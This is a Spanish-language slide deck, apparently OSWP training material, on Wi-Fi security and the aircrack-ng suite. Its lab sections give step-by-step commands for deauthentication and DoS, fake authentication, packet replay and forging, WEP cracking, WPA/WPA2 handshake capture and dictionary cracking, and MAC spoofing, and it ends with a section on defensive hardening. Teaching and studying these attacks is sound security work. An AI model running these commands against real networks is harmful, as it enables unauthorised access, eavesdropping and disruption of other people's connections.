HACKING IN WIRELESS NETWORKS

ORIENTADO A COSWP
Aircrack-NG

Ing. Luis Flores Nogales

 Objetivo
• Conocer el funcionamiento de las
redes 802.11 a/b/g
• Identificar vulnerabilidades de las
redes inalámbricas WIFI
• Realizar ataques a medidas y
protocolos de seguridad débiles
• Encontrar Passwords de redes
con encriptación WEP, WPA,
WPA2 PSK
• Desencriptar paquetes de datos
con cifrado WEP WPA,WPA2 PSK
 INTRODUCCION

Estándares Wifi

 802.11 Legacy
 802.11a (54 Mbps en 5.8 Ghz)
 802.11b (11 Mbps en 2.4 Ghz)
 802.11g (54 Mbps en 2.4 Ghz)
 802.11e (QoS sobre wireless)
 802.11i (Seguridad)
 802.11n (> 100 Mbps)
Conceptos: Definiciones
• Frecuencia: de 2 a 5 GHz (Radio)
• Canal: Una porción del espectro de radiofrecuencias que
usan los dispositivos para comunicarse. El uso de
diferentes canales ayuda a reducir interferencias
• BSSID (Basic Service Set Identifier): Dirección única
que identifica al Router/AP que crea la red wireless. Tiene
formato de MAC address
• ESSID (Extended Service Set Identifier): Nombre único
de hasta 32 caracteres para identificar a la red wireless.
Todos los componentes de la misma red WLAN deben
usar el mismo.
• SSID (Service Set Identifier): Equivalente a ESSID
Infrastructure Mode

• Basic Service Set (BSS)

• Distribution System (DS).
• Extended Service Set (ESS)
• En Linux OS's, la estacion STA es usualmente llamada “Managed”
mode cuando la tarjete actua como AP, es usualmente llamada
“Master” mode.
Ad hoc network .

 Redes “ad-hoc”
Independent Basic Service Set - IBSS
Monitor Mode
Performing a Site Survey: Performing the
Survey (continued)

Figure 7-12: Data rate boundaries

CWNA Guide to Wireless LANs, 8
Second Edition
CSMA/CA

1 El nodo 1 envía un “Request to send " al nodo 2

2 Si no se ha producido ninguna colision y la petición es aceptada, el nodo 2 envía
un "Clear to send " al nodo 1 diciéndole que proceda.
3 El nodo 1 envía sus datos.
4 Se envía un ACK‟ed por el nodo 2 Si recibe los datos (nada se envía si se produce
un error).
Conceptos: Funcionamiento (I)

• Descubrimiento: La estación ha de conocer la

existencia del PA al que conectarse.
– Descubrimiento Pasivo: Espera recibir la
señal de PA
– Descubrimiento Activo: La estación lanza
tramas a un PA determinado y espera una
respuesta
• Autenticación: La estación ha de autenticarse
para conectarse a la red
• Asociación: La estación ha de asociarse para
poder intercambiar datos con otras.
• Cifrado: Protección de los datos que se envían
a través de la red.
Interactuando con redes Inalámbricas
BEACONS FRAMES
PROVE REQUEST AND PROVE
RESPONSE

AP: [Link]
ESSID: Appart
STA: [Link]
Prove Request and Prove response
Prove Request and prove response
PROVE REQUEST AND PROVE
RESPONSE
Autenticación
– Open System Authentication
– Shared Key Authentication (WEP)
– Ambos permiten autenticación por filtrado de MAC
Autenticación – Abierta

• El proceso de autenticación se realiza en texto

plano
• No se verifica ni al usuario ni al host, es abierta a
cualquiera
• Normalmente está ligada al uso del sistema WEP
• Un cliente puede asociarse al AP con una clave
WEP incorrecta o incluso sin una clave WEP, pero
no podrá enviar o recibir datos, ya que la carga de
paquetes estará encriptada.
Authentication request
Authentication response
Autenticación – Clave Compartida

• Funciona de manera análoga al caso anterior, solo

que agrega un paso
• La clave compartida requiere que el cliente y el
Access point tengan la misma clave WEP
• El AP envía un “desafío” al cliente el cual es
encriptado con la clave WEP y vuelto a enviar al AP
para su aprobación
• No debe utilizarse debido a que un intruso puede
capturar texto plano (desafío) y su correspondiente
texto encriptado, facilitando la obtención de la clave
Authentication Shared Key WEP
Authentication request

BSSID: [Link] ESSID: teddy

STA MAC: [Link]
Authentication response
El texto cifrado desafío se envía al punto de
acceso.
Authentication Realizada
Association

La tercera y última etapa antes de poder conectarse a y

participar en una red
Association request
Association response
Wired Equivalent Privacy RC4
Encriptación WEP
 Problemas de Seguridad
• El acceso de usuarios no
autorizados a nuestra red para
robar información o para hacer uso
de nuestra conexión a Internet

El área de cobertura
inalámbrica excede los
límites de la oficina

Red Inalámbrica Detectada!!!

Intentando conectar se a la Red…
Usuario No Autorizado

PELIGRO!!! Conexión existosa a la Red

Inalámbrica!!!
PROBLEMAS DE SEGURIDAD EN REDES
INALÁMBRICAS
 Wardriving -> Búsqueda de redes inalámbricas
Objetivos:
• Acceso gratis a internet.
• Espionaje de redes públicas o privadas.
Material necesario:
• Portátil, Wi-Fi integrado
• Antena.
• Software de soporte (“kismet”, “aircrack”)
• Automóvil.
PROBLEMAS DE SEGURIDAD EN REDES
INALÁMBRICAS

 WarChalking -> Lenguaje de símbolos para

“publicar” la información obtenida en Wardriving
PROBLEMAS DE SEGURIDAD EN
REDES INALÁMBRICAS
 Puntos de acceso no autorizados
• Situación en la que el asaltante sitúa un PA hostil (con una configuración

insegura a propósito) en nuestra red de confianza -> Acceso a

información sensible y confidencial.
PROBLEMAS DE SEGURIDAD EN
REDES INALÁMBRICAS
◄ Problemas de Seguridad
o Inexistencia de delimitación física de forma clara
o Puntos de acceso en la red interna desprotegida:
vulnerando seguridad de la compañía

Man
Man––In-The-Middle
In-The-Middle
VULNERABILIDADES EN 802.11
Amenazas

• Uso ilegítimo del ancho de banda

• Violación de privacidad
• Tráfico ofensivo o delictivo por el que somos
responsables (AUP)
• Acceso a recursos restringidos por rangos IP
 Funcionamiento de una red
inalámbrica
• Tipos de tramas Wireless
– Tramas de Gestión:
• Ayudan al las estaciones a localizar y asociarse a PA
disponibles.
• Se transmiten igual que las demás pero no se envía a las
capas superiores. Nivel 2
• Tramas Baliza o “Beacon Frames” envían:
– Sincronización horaria
– Anchos de banda, canal, tipo de señal, etc..
– SSID
• Las redes que no emiten el SSID en las BFs se denominan
“redes cerradas” (Requieren Descubrimiento Activo)
– Tramas de Control: Usadas para el control de acceso al medio.
– Tramas de Datos: Usadas para la transmisión de los datos
Canales

• Se definen 14 canales distintos, cada uno de

los cuales tiene un Ancho de Banda de 22
MHz
• Para la transmisión, la cantidad de canales
depende de la reglamentación de cada País
 EVITAR SOBRELAPAMIENTO DE
CANALES (DOS)
Canales
 Denegación de Servicio

DoS (Denegación de Servicio)

 Desociación de una Terminal con el AP
 aireplay -0 100 -a [Link] -c [Link] ath0
 Inhibidores de Wifi
Des autenticación cuando la autenticación
no es valida CODE2
Control de Acceso

Filtrado de direcciones MAC

44
 SUPLANTACION

Spoofing de MAC Address

Windows Linux

Regedit
macchanger -m [Link] wifi0
HKEY_LOCAL_MACHINE
SYSTEM
CurrentControlSet
Control
Class
4D36E972
Microsoft Windows XP Wireless
Auto Configuration Algorithm

• Primero, el cliente construye una lista de todas

las redes inalambricas a su alcance
• Envia un broadcast de Probe Request en cada
canal.
Wireless Auto Configuration
Algorithm

• Los access points en el rango responden con

Probe Responses
Wireless Auto Configuration
Algorithm

• Si los Probe Responses son recibidos received

for networks in preferred networks list:
– Connect to them in preferred networks list order
• Otherwise, if no available networks match
preferred networks:
– Specific Probe Requests are sent for each preferred
network in case networks are “hidden”
Wireless Auto Configuration
Algorithm

• If still not associated and there is an ad-hoc

network in preferred networks list, create
the network and become first node
– Uses self-assigned IP address (169.254.Y.Z)
Wireless Auto Configuration
Algorithm

• Finally, if “Automatically connect to non-preferred

networks” is enabled (disabled by default),
connect to networks in order they were detected
• Otherwise, wait for user to select a network or
preferred network to appear
– Set card’s desired SSID to random 32-char value, Sleep
for minute, and then restart algorithm
Descubrimiento Pasivo

Nodo Beacon Punto Acceso

¿Coincide el SSID? Association Req
El PA acepta
Association Resp
al Nodo.
El Nodo se Asocia
Descubrimiento Activo

Nodo Probe Req Punto Acceso

Probe Resp ¿Coincide el SSID?

Coincide el SSID Association Req

Association Resp El PA acepta

al Nodo.
El Nodo se Asocia
 WIFI HACKING

WEP
Debilidades:

 Clave secreta (estática, modificación manual, las estaciones que comparten

AP utilizan la misma clave)
 IV utilizado de longitud insuficiente (24 bits). En redes con alto tráfico se
pueden capturar dos tramas con el mismo IV -> Peligro de descubrimiento de
la clave secreta.
Vulnerando WPA – WPA2 – (WIFI Protect Access)

Obtener un archivo con la captura del establecimiento de conexión entre el cliente y el

AP (Handshake).
 El Nombre del SSID
 Un diccionario
 Ataques de Denegación de Servicio
Airmon-ng and Iwconfig
Monitor Mode
Ing. Luis Flores Nogales
Airmon-ng
Airmon-ng
Airmon-ng only one channel Sniff
Lab 1
Airmon-ng and Iwconfig
Monitor Mode
Ing. Luis Flores Nogales
-OSWP-
Airmon-ng
Airmon-ng
Airmon-ng only one channel Sniff
Lab 1
Monitoring Space with
Airodump-ng
Ing. Luis Flores
Airodump-ng
• Usos:
• Airodump-ng <options> <interface> , [interface…]
Airodump-ng
Airodump-ng Filtering

Donde:
• -c: es el canal del access point a atacar.
• --bssid: Mac Address del AP.
• -w: nombre del archivo .cap donde se guardara los datos en
modo promiscuo.
• Mon0: Interfaz en modo monitor.
Airodump-ng Sniffing
Lab 2
Aireplay-ng

Ing. Luis Flores Nogales

COSWP
Aireplay-ng Ataques!!!!

• Attack 0: Deauthentication
• Attack 1: Fake authentication
• Attack 2: Interactive packet replay
• Attack 3: ARP request replay attack
• Attack 4: KoreK chopchop attack
• Attack 5: Fragmentation attack
• Attack 9: Injection test
Aireplay Attack 9 -- Injection test

• aireplay-ng -9 -e teddy -a [Link] mon0

• -9 - injection test.

• -e teddy – nombre de la red (SSID).

• -a [Link] - MAC address de el AP (BSSID).

• Mon0 – nombre del Interfaz en modo monitor

Lab 3
Aireplay-ng

Aireplay Attack 0 - Deauthentication

Aireplay Attack 0 - Deauthentication

• Recuperar Redes Ocultas/ cloaked ESSID.

• Capturar WPA/WPA2 handshakes forzando a clientes a
re autenticarse
• Generar ARP requests
• Por supuesto, este ataque es totalmente inútil si no hay
ningún cliente inalámbricos asociados de la red.
USES

• aireplay-ng -0 1 -a [Link] -c
[Link] ath0
• Donde:
• -0 - deauthentication attack
• 1 Numero de deauts a enviar ; 0 significa envios continuos.
• -a [Link] - la MAC address de el AP
• -c [Link] – la MAC address de el cliente a des-
auntenticar ;si esto se omite todos los clientes seran
desautenticados.
• ath0 – Interfaz en modo monitor
Lab 4
Aireplay-ng
Aireplay Attack 1 - Fake authentication
Ataque de Falsa Autenticación

• El ataque de autenticación falso:

• Permite realizar los dos tipos de autenticación WEP
(sistema abierto y clave compartida).
• Permite Asociarse al AP
• Este ataque es útil en situaciones donde no hay ningún
cliente asociado.
• Tenga en cuenta que los ataques de falsos de
autenticación no generan paquetes ARP.
Ataque de Falsa Autenticación

• aireplay-ng -1 0 -e teddy -a [Link] -h

[Link] ath0

• Donde :
•  -1 – Falsa Autenticación
•  0 – Tiempo de de-asociación en segundos
•  -e – tedddy Es el nombre del AP “ESSID”
•  -a [Link] – La direccion MAC del AP
•  -h [Link] – Nuestra direccion MAC de la WNIC
•  ath0 – Interfaz en modo monitor.
Otra Variacion para Muchos AP

• aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a [Link] -h

[Link] ath0

• 6000 – Re autenticarse cada 6000 segundos. El Largo Periodo

tambien causa que paquetes KEEP ALIVE se envien.
• -o 1 – Enviar sólo un conjunto de paquetes a la vez. Por defecto es
múltiple y esto confunde algunos AP
• -q 10 – Envia Paquetes keep alive cada 10 segundos.
•
Falsa Autenticacion Realizada
TIPS

• Algunos AP requieren re asociarse cada 30 seg si no el

cliente es desconectado.

• aireplay-ng -1 30 -e <ESSID> -a [Link] -h

[Link] ath0
Tips Filtrado de direcciones MAC
permitido???
• Obtener una Mac legitima:
• SPOOFING DE MAC ADDRESS

• macchanger -m [Link] mon0

LAB 5
AIREPLAY-NG

Aireplay Attack 2 - Interactive packet replay

Natural Packet Replay

• aireplay-ng -2 -b [Link] -d [Link] -t 1

ath0
• Where:
• -2 - interactive replay
• -b [Link] – direccion mac AP
• -d [Link] – selecciona paquetes con destino de
broadcast
• -t 1 – selecciona paquetes con “To Distribution System” con la
bandera en 1.
• ath0 – Interfaz de la red
Natural Packet Replay
Modified Packet Replay

• aireplay-ng -2 -b [Link] -t 1 -c
[Link] -p 0841 ath0
• Donde :
•  -2 - interactive replay
•  -b [Link] - Mac AP
•  -t 1 –Selecciona paquetes con “hacia el DS sistema de
distribucion”
•  -c [Link] – Se envia un broadcast para generar
nuevos VI
•  -p 0841 – Setea el frame control para que este simule ser un
paquete enviado por un cliente wireless.
•  ath0 – Interfaz en modo monitor
Modified Packet Replay

• La IV generados por segundo variará según el tamaño

del paquete seleccionado. Cuanto menor sea el tamaño
del paquete, mayor sera la tasa por segundo. Cuando
se inicia, el programa será el siguiente aspecto:
Lab 6
AIREPLAY-NG

Aireplay Attack 3 - ARP Request Replay Attack

Aireplay Attack 3 - ARP Request Replay Attack

• El ataque de reproducción de solicitud ARP clásico es la manera

más eficaz para generar nuevos vectores de inicialización
• . Este ataque es probablemente el más fiable de todos. El programa
está a la escucha de un paquete de ARP, a continuación,
retransmite volver al punto de acceso.
• Esto, a su vez hace que el punto de acceso repetir el paquete ARP
con un nuevo IV. El programa retransmite el mismo paquete de ARP
una y otra vez.
Aireplay Attack 3 - ARP Request Replay Attack

• Usos:
• aireplay-ng -3 -b [Link] -h
[Link] ath0
• Where:
• -3 Significa Ataque ARP request replay
• -b [Link] Es la direccion MAC del AP
• -h [Link] Es la Mac address origen (Un
cliente asociado o una Falsa autenticacion.
Aireplay Attack 3 - ARP Request Replay Attack

• Reproducir una repetición de ARP anterior. Se trata de un caso

especial del ataque de reproducción de paquete interactivo. Se
presenta aquí ya que es complementario al ataque de reproducción
de solicitud ARP.

• aireplay-ng -2 -r replay_arp-[Link] ath0

• -2 Ataque de Interactive Packet replay

•  -r replay_arp-[Link] es el nombre de el archivo del
ultimo arp replay efectivo.
•  ath0 – Interfaz en modo monitor
Lab 7
AIREPLAY-NG

Aireplay Attack 4 - KoreK chopchop

The Chop Chop Attack

• aireplay-ng -4 -b [Link] -h
[Link] ath0
• Donde:
• -4 - chopchop attack
• -h [Link] MAC de un usuario conectado o la MAC de
tu Tarjeta inalambrica FAKE authentication
• -b [Link] – La MAC Address del AP atacado
• ath0 –El interfaz en modo monitor
The Chop Chop Attack
The Chop Chop Attack
The Chop Chop Attack

• Success!
• El archivo “replay_dec-[Link]” puede ser
usado para generar el paquete usando Packetforge-ng
(el cual es un paquete ARP ). Tu tambien puedes usar
tcpdump o Wireshark Para ver el paquete Descifrado el
cual esta guardado en el Archivo.
PACKETFORGE-NG

• Para forzar un ARP request. El IP de origen (en este

caso [Link]) no tiene problemas , Como sea el
IP de destino ([Link]) debe responder a ARP
requests. La direccion MAC de origen debe permanecer
asociada a la estacion.

• packetforge-ng -0 -a $AP -h $ATH -k [Link] -l

[Link] -y replay_dec-[Link] -w [Link]
• Enviamos nuestro Paquete Forzado usando ARP REQUEST
• aireplay-ng -2 -r [Link] ath0
Laboratorio 8
AIREPLAY-NG

Aireplay Attack 5 - Fragmentation Attack

Fragmentation Attack

• Usos : aireplay-ng -5 -b [Link] -h

[Link] ath0
• Donde :
• -5 - fragmentation attack
• -b [Link] - Direccion MAC AP
• -h [Link] – direccion MAC origen de el
paquete que sera inyectado.
• ath0 – Interfaz en modo monitor.
Fragmentation Attack
Fragmentation Attack

• El paquete respondera:
Laboratorio
AIREPLAY-NG

PACKETFORGE-NG
PACKETFORGE-NG

• Crea paquetes encriptados para que sean inyectados.

• Es necesario obtener el PRGA
• El PRGA se lo obtiene usando CHOP CHOP,
FRAGMENTATION ATTACK.
PACKETFORGE-NG

• Packetforge-ng <modo> <opciones>

• Modos (usar dobles --):

• --arp : Forzar un paquete ARP (-0)
• --udp : Forzar un paquete UDP (-1)
• --icmp :Forzar un paquete ICMP (-2)
• --null : construir paquetes NULL (-3)
PACKETFORGE-NG

• Opciones:
• -a <BSSID> : Direccion del Mac Access Point
• -c <dmac> : Direccion MAC de destino
• -h <smac> : Mac address origen (atacante)
• -e : desabilitar WEP encryption
• -k <ip[:port]> :IP destino [Port]
• -l <ip[:port]> : IP origen [Port]
• -t ttl : Time To Live
• -w <file> : Escribir archivo en PCAP.
• -y <file> : read PRGA from this file
PACKETFORGE-NG

• Ejemplo de uso:
• Packetforge-ng -a AABBCCDDEEFF –h 1122334455AA
–k [Link] –l [Link]
-y [Link] -w arp-request
Verificando el paquete creado

• Airdecap-ng -w Passw0rd arp-request

tcpdump -n -vvv -e -s0 -r arp-request-dec

Laboratorio 9
Hacking WEP 101

Escenario 1 (con clientes)

Hacking WEP 101

• Equipo usado:

• MAC address de la PC que usa Aircrack-ng :

[Link]
• BSSID (MAC address deAP): [Link]
• ESSID (Wireless network name): EPSAS
• Access point channel: 9
• Wireless interface: mon0
 Basic STEPS
• Los Pasos necesarios :
• 1. Comenzar poniendo en modo Monitor la WNIC
• 2. Airodump-ng en el canal del AP y filtrar elBSSID.
• 3. Usar Aireplay-ng to fake authenticate con el AP
• 4. Iniciar Aireplay-ng en modo ARP request replay para
injectar paquetes.
STEP 1

Airmon-ng start wlan0

Iwconfig
STEP 2

• Airodump-ng para capturar IVs

airodump-ng -c 9 --bssid [Link] -w output
ath0
STEP3

• aireplay-ng -1 0 -e teddy -a [Link] -h

[Link] ath0

• -1 Ataque de falsa autenticación

• 0 tiempo de re asociación
• -a Mac Access Point
• -h Mac Atacante
STEP 4

• Aireplay-ng en modo ARP request replay

• aireplay-ng -3 -b [Link] -h
[Link] ath0
STEP5

• aircrack-ng -z -b [Link] output*.cap

• -z PTW attack solo con ataques de ARP

• -b Mac AP
Laboratorio 10
Hacking WEP 101

Escenario 2 Cracking WEP with no wireless

clients
Hacking WEP 101

Equipo usado:
MAC address de la PC con Aircrack-ng
[Link]
BSSID (MAC address del AP): [Link]
ESSID:teddy
Access point canal: 9
Wireless interface: ath0
Los Pasos necesarios :

1 – Iniciar el interfaz WNIC en modo monitor

2 Iniciar Airodump-ng
3 – utilizar Aireplay-ng con Falsa Autenticacion
4 - Usar Aireplay-ng chopchop o fragmentation attack para
obtener el PRGA
5 – Utilizar Packetforge-ng para crear un paquete de ARP
utilizando el PRGA obtenido en el anterior paso.
6 - Injectar el paquete creado en el step 5
step1

• airmon-ng start wifi0 9

STEP2

• airodump-ng -c 9 --bssid [Link] -w

capture ath0

• -c 9 canal que se utiliza.

• --bssid [Link] – la direccion MAC del AP
Esto eliminara trafico no deseado
--ivs – Esto especifica que solo se capturaran IV. No
utilize esta opcion cuando utilize “aircrack-ng -z”.
• -w capture – archivo que contiene los IVs.
• ath0, mon0 – El nombre del interfaz
STEP3

• aireplay-ng -1 0 -e teddy -a [Link] -h

[Link] ath0
-1 - fake authentication
0 - reassociation timing in seconds
-e teddy - the wireless network name
-a [Link] - the AP MAC address
-h [Link] - our card MAC address
Ath0,mon0 - the wireless interface name
STEP4

• aireplay-ng -5 -b [Link] -h
[Link] ath0

• -5 - fragmentation attack
• -b [Link] – Direccion de la MAC del AP
• -h [Link] – la direccion MAC de nuestra
tarjeta en usada en fake authentication
• Ath0,mon0 es el interfaz en modo monitor
STEP5

packetforge-ng -0 -a [Link] -h
[Link] -k [Link] -l
[Link].255 -y [Link] -w
arp-request
-0 – generar un paquete ARP
-a [Link] – la direccion MAC del AP
-h [Link] - MAC de nuestra tarjeta
-k [Link] IP de destino (la mayoria de los APs responden a
[Link])
-l [Link]– IP de origen
-y [Link] - archivo a leer PRGA
-w ARP-request – nombre del archivo a escribir el paquete .

 -w ARP-request - name of file to write the ARP packet to

STEP6

• Verificacion del paquete:

airdecap-ng -e teddy -w <password> arp-request
STEP7

• Inyeccion del paquete WEP creado:

aireplay-ng -2 -r arp-request ath0

-2 - use interactive frame selection

-r ARP-request -defines the file name from which to read
the ARP packet
Ath0,mon0 - the interface to use
Incremento de paquetes por segundo
STEP8

• aircrack-ng –z -b [Link] capture*.cap

-z – Usar el metodo PTW WEP-cracking.

capture*.cap - selects all dump files starting with “capture”
and ending in “cap”.
-b [Link]
Laboratorio 11
CRACKING WPA, WPA2

WPA PSK, WPA2 PSK

Objetivo

• Capturar el HANDSHAKE DE AUTENTICACION

Aquí tenemos a nuestros Jugadores

• Dirección MAC de la PC que esta utilizando Aircrack-ng

suite: [Link]
• Direccion MAC de el cliente wireless qu esta utilizando
WPA2: [Link]
• BSSID (MAC address del AP): [Link]
• ESSID (Nombre de la red inalambrica): teddy
• Access point channel: 9
• Interfaz Wireless modo monitor: ath0,mon0
STEPS

• 1. Habiliatar el interfaz inalambrico en modo monitor.

• 2. Arrancar Airodump-ng con el canal del AP y filtrar el
BSSID para guardar el authentication handshake
• 3. Utilizar Aireplay-ng para deauthenticate a un cliente
wireless.
• 4. Aircrack-ng para crackear el pre-shared key usando
el authentication handshake
step1

• airmon-ng start wifi0 9

STEP2

• airodump-ng -c 9 --bssid [Link] -w psk

ath0

• -c 9 canal que se utiliza.

• --bssid [Link] – la direccion MAC del AP
Esto eliminara trafico no deseado

• -w psk – archivo que contiene el handshake.

• ath0, mon0 – El nombre del interfaz
STEP3

• aireplay-ng -0 1 -a [Link] -c
[Link] ath0

-0 - deauthentication
1 numero de deauths a enviar (se pueden enviar multiples
si se quiere)
-a [Link] – la direccion MAC del AP
-c [Link] – la direccion MAC del cliente a
deauths
ath0 – Interfaz en modo monitor
STEP4

• aircrack-ng -w [Link] -b [Link]

psk*.cap
• Donde:
• -w [Link] – El nombre del diccionario a utilizar. 
*.cap – Archivo que contiene el trafico capturado con el
HANDSHAKE.
-b [Link] direccion MAC del AP
WPA Cracked
lab12
Decrypt traffic with Airdecap-ng

OPEN,WEP,WPA PSK, WPA2 PSK

AIRDECAP-NG

• airdecap-ng [options] <pcap file>

Ejmplos de Uso

• El siguiente remueve los headers wireless

airdecap-ng -b [Link] [Link]
• El siguiente descifra paquetes cifrados con WEP
utilizando una clave hexadecimal.
• airdecap-ng -w 11A3E229084349BC25D97E2939
[Link]
• El siguiente descifra WPA/WPA2 usando una
passphrase:
• airdecap-ng -e 'the ssid' -p passphrase [Link]
lab13
Airtun-ng modo WIDS

• airtun-ng -a [Link] -w 1234567890 ath0

• ifconfig at0 up
Como mejorar la seguridad WIFI?
METODOS DE SEGURIDAD
SEGUROS
SOLUCIÓN BÁSICA
QUE ES UN PORTAL CAUTIVO?

Sistema de validación de
clientes para nodos wireless.
Diferentes implementaciones

• NoCat Auth: [Link]

• LANRoamer: [Link]
• Wireless Heartbeat:
• [Link]
• NetLogon - Linkoping University
• FisrtSpot (PatronSoft):
• [Link]
• WiCap (OpenBSD): [Link]
Estándar IEEE 802.1X

◄ Estándar para realizar control de acceso a una red

◄ Componentes:
 Suplicante
 Autenticador o Punto de Acceso
 Servidor de Autenticación: RADIUS (RFC 2865, RFC 2866, RFC 3580)
◄ 1X hace referencia al uso de EAP
◄ Costos asociados
◄ Solución escalable
Funcionamiento 802.1X
PEAP-TTLS

• También evitan la utilización de certificados de cliente

• Sí utilizan certificados Para autenticar la red wireless
• Proceso en dos pasos:
– Autenticar el servidor y negociar claves de cifrado Para crear un
túnel
– Utilizar el túnel Para negociar la autenticación del cliente
PEAP-TTLS
802.1x en 802.11

Inalámbrico
Punto de acceso
Servidor RADIUS
Equipo portátil Ethernet
Asociación
Acceso bloqueado
Asociado 802.11 802.11
RADIUS
Inicio de EAPOL

Identidad de solicitud de EAP

Identidad de respuesta de EAP Solicitud de acceso de RADIUS

Desafío de acceso de RADIUS

Solicitud de EAP

Respuesta de EAP (credenciales) Solicitud de acceso de RADIUS

Éxito de EAP Aceptación de acceso de RADIUS

Acceso permitido
Clave de EAPOL (clave)
Ejemplo de Autenticación PEAP-MS-CHAP v2

Cliente Punto Acceso RADIUS

Asociación

Establecimiento de canal seguro TLS (PEAP)

Autenticación MS-CHAP V2

Resultado Autenticación

Acceso Permitido

Desasociación
Configuración de 802.1x
1. Configurar ZEROSHELL con RADIUS
2. Unir un dominio
3. Inscribir un certificado de equipo
4. Registrar RADIUS en PEAP
5. Configurar el registro RADIUS
6. Agregar el punto de acceso como cliente RADIUS
7. Configurar el punto de acceso para RADIUS y 802.1x
8. Crear una directiva de acceso para clientes inalámbricos
9. Configurar los clientes
– Importar el certificado emitido por la autoridad
certificadora
SOLUCIÓN!!!!!
Hardening De La red Inalámbrica
◄Evitar la difusión del SSID (Service Set Identifier).
◄ Establecer listas de control de acceso por direcciones de
MAC (Media Access Control) de los dispositivos que
acceden a la red.
◄ Utilizar cifrado en las conexiones inalámbricas.
◄ Segmentar los puntos de acceso inalámbricos en zonas de
seguridad administradas por un firewall.
◄ Establecer redes privadas virtuales en las conexiones
inalámbricas.
◄ Combinar mecanismo de autenticación a la red y cifrado de
datos
 GRACIAS
OSWP Ing. Luis Flores Nogales
lflores@[Link]
Luisfloresnogales@[Link]